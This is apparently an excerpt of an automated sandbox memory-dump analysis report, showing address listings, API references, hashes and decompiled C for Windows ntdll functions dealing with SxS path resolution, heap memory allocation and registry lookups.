                                                                                                                            0x6b1f2438
                                                                                                                            0x6b1f2445
                                                                                                                            0x6b1f244c
                                                                                                                            0x6b1f244f
                                                                                                                            0x6b1f2452
                                                                                                                            0x6b1f2456
                                                                                                                            0x6b1f245c
                                                                                                                            0x6b1f2460
                                                                                                                            0x6b1f2464
                                                                                                                            0x6b1f246f
                                                                                                                            0x6b1f2475
                                                                                                                            0x6b1f2479
                                                                                                                            0x6b1f2481
                                                                                                                            0x6b1f2489
                                                                                                                            0x6b1f248e
                                                                                                                            0x6b1f2493
                                                                                                                            0x6b1f2498
                                                                                                                            0x6b1f28f5
                                                                                                                            0x6b1f28f5
                                                                                                                            0x6b1f24a0
                                                                                                                            0x6b1f2956
                                                                                                                            0x6b1f2956
                                                                                                                            0x6b1f24a8
                                                                                                                            0x6b1f295d
                                                                                                                            0x6b1f295d
                                                                                                                            0x6b1f24b0
                                                                                                                            0x6b1f24b4
                                                                                                                            0x6b1f24b6
                                                                                                                            0x6b1f24b6
                                                                                                                            0x6b1f24b9
                                                                                                                            0x6b1f24c0
                                                                                                                            0x6b1f24cb
                                                                                                                            0x6b1f24cf
                                                                                                                            0x6b1f24d3
                                                                                                                            0x6b1f24d9
                                                                                                                            0x6b1f24e1
                                                                                                                            0x6b1f24e4
                                                                                                                            0x6b1f24ef
                                                                                                                            0x6b1f24f9
                                                                                                                            0x6b1f280f
                                                                                                                            0x6b1f2816
                                                                                                                            0x6b1f2821
                                                                                                                            0x6b1f2828
                                                                                                                            0x6b1f282f
                                                                                                                            0x6b1f2838
                                                                                                                            0x6b1f2843
                                                                                                                            0x6b1f284b
                                                                                                                            0x6b1f24ff
                                                                                                                            0x6b1f24ff
                                                                                                                            0x6b1f2503
                                                                                                                            0x6b1f2509
                                                                                                                            0x6b23d20f
                                                                                                                            0x6b23d216
                                                                                                                            0x6b23d216
                                                                                                                            0x6b1f250f
                                                                                                                            0x6b1f2516
                                                                                                                            0x6b1f251d
                                                                                                                            0x6b1f2524
                                                                                                                            0x6b1f252b
                                                                                                                            0x6b1f2534
                                                                                                                            0x6b1f2538
                                                                                                                            0x6b1f2538
                                                                                                                            0x6b1f253d
                                                                                                                            0x6b1f2545
                                                                                                                            0x6b1f2549
                                                                                                                            0x6b1f2549
                                                                                                                            0x6b1f2558
                                                                                                                            0x6b1f255b
                                                                                                                            0x6b1f2562
                                                                                                                            0x6b1f2569
                                                                                                                            0x6b1f2570
                                                                                                                            0x6b1f2578
                                                                                                                            0x6b23d220
                                                                                                                            0x00000000
                                                                                                                            0x6b1f257e
                                                                                                                            0x6b1f2580
                                                                                                                            0x6b23d22a
                                                                                                                            0x6b1f2930
                                                                                                                            0x6b1f2932
                                                                                                                            0x6b1f2791
                                                                                                                            0x6b1f2791
                                                                                                                            0x6b1f2797
                                                                                                                            0x6b23d3b8
                                                                                                                            0x6b23d3bf
                                                                                                                            0x6b23d3c3
                                                                                                                            0x6b23d3c3
                                                                                                                            0x6b1f279d
                                                                                                                            0x6b1f27a3
                                                                                                                            0x6b1f27a9
                                                                                                                            0x6b1f2968
                                                                                                                            0x6b1f2971
                                                                                                                            0x6b1f2971
                                                                                                                            0x6b1f27b3
                                                                                                                            0x6b1f27be
                                                                                                                            0x6b1f27be
                                                                                                                            0x6b1f27c5
                                                                                                                            0x6b1f27c9
                                                                                                                            0x6b1f27cf
                                                                                                                            0x6b1f27d1
                                                                                                                            0x6b1f27d3
                                                                                                                            0x6b1f27d3
                                                                                                                            0x6b1f27d8
                                                                                                                            0x6b1f27e5
                                                                                                                            0x6b1f27f0
                                                                                                                            0x6b23d3e0
                                                                                                                            0x6b23d3e5
                                                                                                                            0x00000000
                                                                                                                            0x6b1f27f6
                                                                                                                            0x6b1f27ff
                                                                                                                            0x6b1f2800
                                                                                                                            0x6b1f2801
                                                                                                                            0x6b1f280c
                                                                                                                            0x6b1f280c
                                                                                                                            0x6b1f27f0
                                                                                                                            0x6b1f274b
                                                                                                                            0x6b1f2753
                                                                                                                            0x6b1f2755
                                                                                                                            0x6b1f275e
                                                                                                                            0x6b23d3a4
                                                                                                                            0x6b23d3ad
                                                                                                                            0x6b23d3ad
                                                                                                                            0x6b1f276d
                                                                                                                            0x6b1f2776
                                                                                                                            0x6b1f2778
                                                                                                                            0x6b1f277a
                                                                                                                            0x6b1f277a
                                                                                                                            0x6b1f2776
                                                                                                                            0x6b1f2789
                                                                                                                            0x6b1f278e
                                                                                                                            0x00000000
                                                                                                                            0x6b1f278e
                                                                                                                            0x6b1f2588
                                                                                                                            0x6b1f285d
                                                                                                                            0x6b1f259a
                                                                                                                            0x6b1f259c
                                                                                                                            0x6b1f259e
                                                                                                                            0x6b1f25a1
                                                                                                                            0x6b1f25a5
                                                                                                                            0x6b1f25a8
                                                                                                                            0x6b1f25ac
                                                                                                                            0x6b1f25b2
                                                                                                                            0x6b1f2600
                                                                                                                            0x6b1f2600
                                                                                                                            0x00000000
                                                                                                                            0x6b1f25ba
                                                                                                                            0x6b1f25be
                                                                                                                            0x6b1f25d4
                                                                                                                            0x6b1f25d8
                                                                                                                            0x6b1f287b
                                                                                                                            0x6b1f25e3
                                                                                                                            0x6b1f25e3
                                                                                                                            0x6b1f25e5
                                                                                                                            0x6b1f25e5
                                                                                                                            0x6b1f25eb
                                                                                                                            0x6b23d246
                                                                                                                            0x6b23d246
                                                                                                                            0x6b1f2602
                                                                                                                            0x6b1f2604
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f260c
                                                                                                                            0x6b1f28cf
                                                                                                                            0x6b1f28d3
                                                                                                                            0x6b1f28d7
                                                                                                                            0x6b1f28d7
                                                                                                                            0x6b1f2617
                                                                                                                            0x6b1f261f
                                                                                                                            0x6b1f2624
                                                                                                                            0x6b23d24f
                                                                                                                            0x00000000
                                                                                                                            0x6b1f262a
                                                                                                                            0x6b1f262a
                                                                                                                            0x6b1f2633
                                                                                                                            0x6b1f264a
                                                                                                                            0x6b1f264e
                                                                                                                            0x6b1f26cd
                                                                                                                            0x6b1f26cd
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2663
                                                                                                                            0x6b1f2663
                                                                                                                            0x6b1f266a
                                                                                                                            0x6b23d2c4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d2ca
                                                                                                                            0x6b1f2670
                                                                                                                            0x6b1f2678
                                                                                                                            0x6b1f269c
                                                                                                                            0x6b1f26a0
                                                                                                                            0x6b1f26d7
                                                                                                                            0x6b1f26d7
                                                                                                                            0x6b1f26dd
                                                                                                                            0x6b1f28e1
                                                                                                                            0x6b1f28e8
                                                                                                                            0x6b1f28ec
                                                                                                                            0x6b1f28ec
                                                                                                                            0x6b1f26e3
                                                                                                                            0x6b1f26e5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f26eb
                                                                                                                            0x6b1f270f
                                                                                                                            0x6b1f2714
                                                                                                                            0x6b1f2717
                                                                                                                            0x6b1f28fc
                                                                                                                            0x6b1f28fe
                                                                                                                            0x6b23d352
                                                                                                                            0x00000000
                                                                                                                            0x6b23d368
                                                                                                                            0x6b23d368
                                                                                                                            0x00000000
                                                                                                                            0x6b23d368
                                                                                                                            0x6b23d352
                                                                                                                            0x6b1f2904
                                                                                                                            0x6b1f2904
                                                                                                                            0x6b1f290a
                                                                                                                            0x6b23d38b
                                                                                                                            0x6b23d38f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d39d
                                                                                                                            0x6b23d39d
                                                                                                                            0x6b1f2910
                                                                                                                            0x6b1f291c
                                                                                                                            0x6b1f2920
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2926
                                                                                                                            0x6b1f292c
                                                                                                                            0x6b1f2983
                                                                                                                            0x6b1f2983
                                                                                                                            0x6b1f292e
                                                                                                                            0x00000000
                                                                                                                            0x6b1f292e
                                                                                                                            0x6b1f271f
                                                                                                                            0x6b1f286a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d349
                                                                                                                            0x6b1f2727
                                                                                                                            0x6b1f2738
                                                                                                                            0x6b1f2741
                                                                                                                            0x6b1f2745
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2745
                                                                                                                            0x6b1f2725
                                                                                                                            0x6b1f2725
                                                                                                                            0x00000000
                                                                                                                            0x6b23d325
                                                                                                                            0x6b23d32a
                                                                                                                            0x6b23d331
                                                                                                                            0x6b23d33a
                                                                                                                            0x6b23d33e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d344
                                                                                                                            0x6b1f26eb
                                                                                                                            0x6b1f26a7
                                                                                                                            0x6b1f26ab
                                                                                                                            0x6b1f26ad
                                                                                                                            0x6b1f26b0
                                                                                                                            0x6b1f26b4
                                                                                                                            0x6b23d2cf
                                                                                                                            0x6b23d2d8
                                                                                                                            0x00000000
                                                                                                                            0x6b23d2e9
                                                                                                                            0x6b23d2f6
                                                                                                                            0x6b23d2ff
                                                                                                                            0x6b23d302
                                                                                                                            0x6b23d307
                                                                                                                            0x6b23d30a
                                                                                                                            0x6b23d30d
                                                                                                                            0x6b23d312
                                                                                                                            0x6b23d317
                                                                                                                            0x6b23d31b
                                                                                                                            0x6b1f26c4
                                                                                                                            0x6b1f26c7
                                                                                                                            0x6b1f293d
                                                                                                                            0x6b1f2943
                                                                                                                            0x6b1f297b
                                                                                                                            0x6b1f2945
                                                                                                                            0x6b1f2945
                                                                                                                            0x6b1f2945
                                                                                                                            0x6b1f2949
                                                                                                                            0x6b1f294d
                                                                                                                            0x6b1f26d1
                                                                                                                            0x6b1f26d1
                                                                                                                            0x6b1f26d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f26d5
                                                                                                                            0x00000000
                                                                                                                            0x6b1f26c7
                                                                                                                            0x6b23d2d8
                                                                                                                            0x6b1f26ba
                                                                                                                            0x6b1f26ba
                                                                                                                            0x6b1f26bf
                                                                                                                            0x00000000
                                                                                                                            0x6b1f26bf
                                                                                                                            0x6b1f264e
                                                                                                                            0x6b1f2635
                                                                                                                            0x6b1f263b
                                                                                                                            0x6b23d25d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d263
                                                                                                                            0x6b23d26a
                                                                                                                            0x6b23d279
                                                                                                                            0x6b23d2b4
                                                                                                                            0x6b23d2b4
                                                                                                                            0x00000000
                                                                                                                            0x6b23d2b4
                                                                                                                            0x6b23d27b
                                                                                                                            0x6b23d282
                                                                                                                            0x6b23d28d
                                                                                                                            0x6b23d2aa
                                                                                                                            0x6b23d2ae
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d2ae
                                                                                                                            0x6b23d28f
                                                                                                                            0x6b23d296
                                                                                                                            0x6b23d29d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f263b
                                                                                                                            0x6b1f2624
                                                                                                                            0x6b1f25f6
                                                                                                                            0x6b1f2886
                                                                                                                            0x6b1f288d
                                                                                                                            0x6b1f2891
                                                                                                                            0x6b1f2897
                                                                                                                            0x6b1f289e
                                                                                                                            0x6b1f28a4
                                                                                                                            0x6b1f28ba
                                                                                                                            0x6b1f28be
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f28c4
                                                                                                                            0x00000000
                                                                                                                            0x6b1f28c4
                                                                                                                            0x6b1f25fc
                                                                                                                            0x00000000
                                                                                                                            0x6b1f25fc
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2881
                                                                                                                            0x6b1f25de
                                                                                                                            0x00000000
                                                                                                                            0x6b1f25de
                                                                                                                            0x6b23d23c
                                                                                                                            0x6b23d23c
                                                                                                                            0x6b23d23c
                                                                                                                            0x00000000
                                                                                                                            0x6b23d23c
                                                                                                                            0x6b1f285d
                                                                                                                            0x6b1f2590
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2590

                                                                                                                            APIs
                                                                                                                            • RtlFindCharInUnicodeString.1105(00000001,?,6B1B11BC,00000000), ref: 6B1F25CF
                                                                                                                            • RtlGetFullPathName_UstrEx.1105(?,?,?,?,00000000,00000000,?,00000000), ref: 6B1F2697
                                                                                                                            • memset.1105(?,00000000,0000002C), ref: 6B1F2789
                                                                                                                            • RtlMultiAppendUnicodeStringBuffer.1105(?,00000002,?,00000001,?,6B1B11BC,00000000), ref: 6B1F28B5
                                                                                                                            • RtlFreeUnicodeString.1105(?,?,?,00000001), ref: 6B1F2971
                                                                                                                            • RtlDeleteBoundaryDescriptor.1105(00000000), ref: 6B1F28E1
                                                                                                                              • Part of subcall function 6B1DAD30: RtlFreeHeap.1105(?,00000000,00000001,?,6B2002E9,00000000,?,6B1EECFB,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?), ref: 6B1DAD43
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$Free$AppendBoundaryBufferCharDeleteDescriptorFindFullHeapMultiName_PathUstrmemset
                                                                                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                            • API String ID: 3547848382-3393094623
                                                                                                                            • Opcode ID: d76cb7e1860071a438bd6327768badcf67bf38f514a2b27cfaceb007c8a17323
                                                                                                                            • Instruction ID: f58fff9860f27ea715defba85dfeaa6d330f69a976e57708f302d4388a56bd35
                                                                                                                            • Opcode Fuzzy Hash: d76cb7e1860071a438bd6327768badcf67bf38f514a2b27cfaceb007c8a17323
                                                                                                                            • Instruction Fuzzy Hash: 2202BD70908796ABD320CF64C090B9BB7E8BF99714F11496EF89897250E378C846CBD3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FA229, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 183nativememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E6B1FA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E6B1FDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E6B219730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E6B29A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E6B219660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E6B1DB150();
					} else {
						E6B1DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E6B1DB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E6B1F7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E6B29138A(_t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E6B1F7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E6B1F7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E6B291582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E6B1F7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E6B1F7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E6B291582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E6B22D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                                            0x6b1fa229
                                                                                                                            0x6b1fa231
                                                                                                                            0x6b1fa23f
                                                                                                                            0x6b1fa242
                                                                                                                            0x6b1fa244
                                                                                                                            0x6b1fa24c
                                                                                                                            0x6b1fa255
                                                                                                                            0x6b1fa25a
                                                                                                                            0x6b1fa25f
                                                                                                                            0x6b241c76
                                                                                                                            0x6b241c78
                                                                                                                            0x6b241c7e
                                                                                                                            0x6b241c7f
                                                                                                                            0x6b241c81
                                                                                                                            0x6b241c82
                                                                                                                            0x6b241c84
                                                                                                                            0x6b241c89
                                                                                                                            0x6b241c8b
                                                                                                                            0x6b241c9e
                                                                                                                            0x6b241c9e
                                                                                                                            0x6b241cab
                                                                                                                            0x6b241cb2
                                                                                                                            0x00000000
                                                                                                                            0x6b241cb2
                                                                                                                            0x6b241c8d
                                                                                                                            0x6b241c92
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b241c94
                                                                                                                            0x6b241c98
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b241c98
                                                                                                                            0x6b1fa265
                                                                                                                            0x6b1fa265
                                                                                                                            0x6b1fa266
                                                                                                                            0x6b1fa26f
                                                                                                                            0x6b1fa270
                                                                                                                            0x6b1fa276
                                                                                                                            0x6b1fa277
                                                                                                                            0x6b1fa279
                                                                                                                            0x6b1fa27e
                                                                                                                            0x6b1fa282
                                                                                                                            0x6b241db5
                                                                                                                            0x6b241dbb
                                                                                                                            0x6b241dc1
                                                                                                                            0x6b241dc5
                                                                                                                            0x6b241de4
                                                                                                                            0x6b241de9
                                                                                                                            0x6b241dc7
                                                                                                                            0x6b241ddc
                                                                                                                            0x6b241de1
                                                                                                                            0x6b241def
                                                                                                                            0x6b241df3
                                                                                                                            0x6b241df7
                                                                                                                            0x6b241dfe
                                                                                                                            0x6b241e06
                                                                                                                            0x6b1fa302
                                                                                                                            0x6b1fa308
                                                                                                                            0x6b1fa308
                                                                                                                            0x6b1fa288
                                                                                                                            0x6b1fa28d
                                                                                                                            0x6b1fa294
                                                                                                                            0x6b241cc1
                                                                                                                            0x6b1fa29a
                                                                                                                            0x6b1fa29a
                                                                                                                            0x6b1fa29a
                                                                                                                            0x6b1fa29f
                                                                                                                            0x6b241ccb
                                                                                                                            0x6b241cd1
                                                                                                                            0x6b241cd8
                                                                                                                            0x6b241cea
                                                                                                                            0x6b241cea
                                                                                                                            0x6b241cd8
                                                                                                                            0x6b1fa2a9
                                                                                                                            0x6b1fa2af
                                                                                                                            0x6b1fa2bc
                                                                                                                            0x6b241cfd
                                                                                                                            0x6b1fa2c2
                                                                                                                            0x6b1fa2c2
                                                                                                                            0x6b1fa2c2
                                                                                                                            0x6b1fa2c7
                                                                                                                            0x6b241d07
                                                                                                                            0x6b241d0d
                                                                                                                            0x6b241d14
                                                                                                                            0x6b241d1f
                                                                                                                            0x6b241d21
                                                                                                                            0x6b241d2c
                                                                                                                            0x6b241d2c
                                                                                                                            0x6b241d2c
                                                                                                                            0x6b241d47
                                                                                                                            0x6b241d47
                                                                                                                            0x6b241d14
                                                                                                                            0x6b1fa2cd
                                                                                                                            0x6b1fa2d2
                                                                                                                            0x6b1fa2d9
                                                                                                                            0x6b241d5a
                                                                                                                            0x6b1fa2df
                                                                                                                            0x6b1fa2df
                                                                                                                            0x6b1fa2df
                                                                                                                            0x6b1fa2e4
                                                                                                                            0x6b241d69
                                                                                                                            0x6b241d6b
                                                                                                                            0x6b241d76
                                                                                                                            0x6b241d76
                                                                                                                            0x6b241d76
                                                                                                                            0x6b241d91
                                                                                                                            0x6b241d91
                                                                                                                            0x6b1fa2ea
                                                                                                                            0x6b1fa2f0
                                                                                                                            0x6b1fa2f5
                                                                                                                            0x6b241da8
                                                                                                                            0x6b241dad
                                                                                                                            0x6b241dad
                                                                                                                            0x6b1fa2fd
                                                                                                                            0x6b1fa300
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • ZwAllocateVirtualMemory.1105(000000FF,00000014,00000000,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6B1FA279
                                                                                                                              • Part of subcall function 6B219660: LdrInitializeThunk.NTDLL(6B2618BF,000000FF,00000000,00000000,0000000C,00001000,00000004,6B2B0810,0000001C,6B261616), ref: 6B21966A
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(000000FF,00000014,00000000,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6B1FA288
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1FA2B5
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1FA2CD
                                                                                                                            • ZwQueryVirtualMemory.1105(000000FF,?,00000003,00000014,00000014,00000000,?,?,?,-00000018,?,?,?,?,6B294C8F), ref: 6B241C84
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C), ref: 6B241DDC
                                                                                                                            • DbgPrint.1105(ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix),00000000,?,?,?), ref: 6B241DFE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$MemoryPrintVirtual$AllocateInitializeQueryThunk
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                            • API String ID: 1108326835-2586055223
                                                                                                                            • Opcode ID: 07026b5a4e78fcb9c09012a7848faa5ad56364c92794863bee270f19aa4ac536
                                                                                                                            • Instruction ID: d6418f7c9a0bf6e9370b5c7bc4368db65b33057d6289d26fd86f98703269564c
                                                                                                                            • Opcode Fuzzy Hash: 07026b5a4e78fcb9c09012a7848faa5ad56364c92794863bee270f19aa4ac536
                                                                                                                            • Instruction Fuzzy Hash: AD512072215685AFD302CB68C885F277BF8EF80B16F0505A8F865CB291D72CD841CB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D6F60, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 235nativememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E6B1D6F60(WCHAR* _a4, WCHAR* _a8, void* _a12, signed int _a16, void* _a20, unsigned int _a24, int* _a28) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				char _v32;
				void* _v36;
				void* _v44;
				long _v48;
				char _v52;
				char _v56;
				char _v60;
				int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				int _v80;
				signed int _t72;
				signed int _t81;
				WCHAR* _t88;
				int* _t96;
				void _t100;
				void _t106;
				void* _t107;
				int* _t108;
				long _t111;
				unsigned int _t113;
				unsigned int _t115;
				int _t117;
				void* _t118;
				intOrPtr* _t121;
				void* _t123;
				int _t126;
				void* _t127;
				void* _t128;
				void* _t131;
				signed int _t134;
				long _t136;
				void* _t137;
				signed int _t138;

				_t72 = _a16;
				_t111 = 0;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_t131 = 0;
				if(_t72 != 0) {
					if(_t72 == 1) {
						goto L1;
					}
					_t81 = 0xc00000f1;
					L14:
					return _t81;
				}
				L1:
				_v28 = 0x18;
				_v20 = 0x6b1b16a8 + _t72 * 8;
				_push( &_v28);
				_push(0x20019);
				_v24 = _t111;
				_push( &_v52);
				_v16 = 0x40;
				_v12 = _t111;
				_v8 = _t111;
				_t134 = E6B219600();
				if(_t134 != 0xc0000034) {
					if(_t134 < 0) {
						L10:
						if(_v52 != 0) {
							_push(_v52);
							E6B2195D0();
						}
						if(_v48 != 0) {
							_push(_v48);
							E6B2195D0();
						}
						if(_t131 != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), _t111, _t131);
						}
						_t81 = _t134;
						goto L14;
					}
					RtlInitUnicodeString( &_v36, _a4);
					_v32 = _v60;
					_v28 =  &_v44;
					_push( &_v36);
					_push(0x20019);
					_v36 = 0x18;
					_push( &_v56);
					_v24 = 0x40;
					_v20 = _t111;
					_v16 = _t111;
					_t134 = E6B219600();
					if(_t134 == 0xc0000034) {
						goto L2;
					}
					L20:
					if(_t134 < 0) {
						goto L10;
					}
					_t88 = _a8;
					if(_t88 == 0) {
						_t88 = L"TargetPath";
					}
					RtlInitUnicodeString( &_v44, _t88);
					_t113 = _a24;
					_t136 = _t113 + 0x10;
					if(_t136 >= _t113) {
						_t131 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 0, _t136);
						if(_t131 != 0) {
							_push( &_v80);
							_push(_t136);
							_push(_t131);
							_push(2);
							_push( &_v60);
							_push(_v72);
							_t134 = E6B219650();
							if(_t134 < 0) {
								if(_t134 != 0x80000005) {
									goto L51;
								}
								L32:
								_t117 =  *(_t131 + 8);
								_t49 = _t131 + 0xc; // 0xc
								_t128 = _t49;
								_v80 = _t117;
								if(_t134 < 0) {
									L47:
									_t96 = _a28;
									if(_t96 != 0) {
										 *_t96 = _t117;
									}
									if(_t134 >= 0) {
